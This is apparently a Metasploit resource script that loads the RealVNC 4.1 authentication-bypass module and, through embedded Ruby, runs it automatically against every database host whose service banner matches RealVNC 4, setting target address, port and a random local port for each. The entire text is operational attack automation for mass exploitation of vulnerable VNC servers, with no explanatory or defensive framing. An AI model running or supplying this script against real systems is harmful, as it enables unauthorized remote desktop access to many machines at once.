use auxiliary/admin/vnc/realvnc_41_bypass
set AUTOVNC true

<ruby>
framework.db.hosts.each do |host|
  host.services.each do |service|
    if service.info =~ /realvnc 4/i
      self.run_single("set RHOST #{host.address}")
      self.run_single("set RPORT #{service.port}")
      self.run_single("set LPORT #{rand(31337...65535)}")
      self.run_single("run")
    end
  end
end
</ruby>
